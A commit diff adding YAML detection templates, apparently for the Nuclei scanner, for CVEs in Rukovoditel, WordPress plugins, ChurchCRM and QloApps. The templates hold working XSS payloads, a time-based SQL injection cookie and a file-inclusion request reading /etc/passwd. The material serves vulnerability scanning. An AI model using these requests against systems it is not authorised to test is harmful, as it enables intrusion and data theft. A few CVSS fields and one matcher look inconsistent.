Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

59
http/cves/2022/CVE-2022-44948.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2022-44948
info:
name: Rukovoditel <= 3.2.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/8
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44948
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44948
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'

128
http/cves/2022/CVE-2022-44949.yaml Normal file
View File

@ -0,0 +1,128 @@
id: CVE-2022-44949
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.
reference:
- https://github.com/anhdq201/rukovoditel/issues/12
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44949
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44949
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="form_session_token"
{{nonce}}
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="entities_id"
24
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="forms_tabs_id"
29
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="name"
test
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="short_name"
<script>alert(document.domain)</script>
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="type"
fieldtype_input
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[width]"
input-small
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[default_value]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[is_unique]"
0
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[unique_error_msg]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="required_message"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip_item_page"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access_template"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access[5]"
yes
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access[4]"
yes
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="notes"
------WebKitFormBoundaryfKx13B5QBU5Sccgf--
cookie-reuse: true
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

128
http/cves/2022/CVE-2022-44950.yaml Normal file
View File

@ -0,0 +1,128 @@
id: CVE-2022-44950
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
reference:
- https://github.com/anhdq201/rukovoditel/issues/10
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44950
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44950
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="form_session_token"
{{nonce}}
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="entities_id"
24
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="forms_tabs_id"
29
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="name"
<script>alert(document.domain)</script>
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="short_name"
test
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="type"
fieldtype_input
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[width]"
input-small
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[default_value]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[is_unique]"
0
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[unique_error_msg]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="required_message"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip_item_page"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access_template"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access[5]"
yes
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access[4]"
yes
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="notes"
------WebKitFormBoundaryfKx13B5QBU5Sccgf--
cookie-reuse: true
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

59
http/cves/2022/CVE-2022-44951.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2022-44951
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
reference:
- https://github.com/anhdq201/rukovoditel/issues/11
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44951
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 5.4
cve-id: CVE-2022-44951
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

142
http/cves/2022/CVE-2022-44952.yaml Normal file
View File

@ -0,0 +1,142 @@
id: CVE-2022-44952
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/9
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44952
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 5.4
cve-id: CVE-2022-44952
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="form_session_token"
{{nonce}}
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_NAME]"
Test
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"
test
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="APP_LOGO"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_LOGO]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="APP_FAVICON"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_FAVICON]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"
<script>alert(document.domain)</script>
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"
english.php
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_SKIN]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"
America/New_York
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"
10
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"
m/d/Y
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"
m/d/Y H:i
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"
2/./*
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"
0
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"
0
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"
0
------WebKitFormBoundaryMh2HSjWbM7zJjWOA--
- |
@timeout: 5s
GET /index.php?module=dashboard/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_4 == 200'
- 'contains(content_type_4, "text/html")'
- 'contains(body_4, "<script>alert(document.domain)</script>")'
- 'contains(body_4, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true

46
http/cves/2023/CVE-2023-0514.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2023-0514
info:
name: Membership Database <= 1.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05
- https://wordpress.org/plugins/member-database/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0514
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0514
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "Member Database")'
condition: and

36
http/cves/2023/CVE-2023-1730.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2023-1730
info:
name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.
remediation: Fixed in version 3.1.5
reference:
- https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7
- https://wordpress.org/plugins/supportcandy/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1730
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-1730
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "supportcandy")'
condition: and

43
http/cves/2023/CVE-2023-1835.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2023-1835
info:
name: Ninja Forms < 3.6.22 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/b5fc223c-5ec0-44b2-b2f6-b35f9942d341
- https://wordpress.org/plugins/ninja-forms/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1835
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-1835
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
- 'contains(body_2, "Ninja Forms")'
condition: and

44
http/cves/2023/CVE-2023-1890.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-1890
info:
name: Tablesome < 1.0.9 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d
- https://wordpress.org/plugins/tablesome/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1890
remediation: Fixed in version 1.0.9.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-1890
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert`document_domain`</script>")'
- 'contains(body_2, "tablesome")'
condition: and

44
http/cves/2023/CVE-2023-2023.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-2023
info:
name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
remediation: Fixed in version 3.7.3
reference:
- https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317
- https://wordpress.org/plugins/custom-404-pro/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2023
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2023
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "onanimationstart=alert(document.domain)//")'
- 'contains(body_2, "Custom 404 Pro")'
condition: and

42
http/cves/2023/CVE-2023-2252.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-2023-2252
info:
name: Directorist < 7.5.4 - Local File Inclusion
author: r3Y3r53
severity: medium
description: |
Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
remediation: Fixed in version 7.5.4
reference:
- https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69
- https://wordpress.org/plugins/directorist/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2252
metadata:
max-request: 2
verified: true
tags: cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

46
http/cves/2023/CVE-2023-2272.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2023-2272
info:
name: Tiempo.com <= 0.1.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/dba60216-2753-40b7-8f2b-6caeba684b2e
- https://wordpress.org/plugins/tiempocom/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2272
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2272
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
- 'contains(body_2, "Tiempo")'
condition: and

2
http/cves/2023/CVE-2023-26842.yaml
View File

@ -17,7 +17,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
verified: true verified: true
tags: cve,cve2023,churchcrm,stored,xss,authenticated tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated
http: http:
- raw: - raw:

2
http/cves/2023/CVE-2023-26843.yaml
View File

@ -17,7 +17,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
verified: true verified: true
tags: cve,cve2023,churchcrm,stored,xss,authenticated tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated
http: http:
- raw: - raw:

44
http/cves/2023/CVE-2023-30256.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-30256
info:
name: Webkul QloApps 1.5.2 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.
reference:
- https://github.com/webkul/hotelcommerce
- http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html
- https://github.com/ahrixia/CVE-2023-30256
- https://nvd.nist.gov/vuln/detail/CVE-2023-30256
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-30256
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,xss,webkul-qloapps,unauth
http:
- method: GET
path:
- "{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "xss onfocus=alert(document.domain) autofocus= xss"
- "hasConfirmation"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

44
http/cves/2023/CVE-2023-30777.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-30777
info:
name: Advanced Custom Fields < 6.1.6 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f
- https://wordpress.org/plugins/advanced-custom-fields/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-30777
remediation: Fixed in version 6.1.6.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-30777
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "onanimationstart=alert(document.domain)//")'
- 'contains(body_2, "Advanced Custom Fields")'
condition: and

2
http/cves/2023/CVE-2023-31548.yaml
View File

@ -17,7 +17,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
verified: true verified: true
tags: cve,cve2023,churchcrm,stored,xss,authenticated tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated
http: http:
- raw: - raw:

47
http/cves/2023/CVE-2023-36287.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2023-36287
info:
name: Webkul QloApps 1.6.0 - Cross-site Scripting
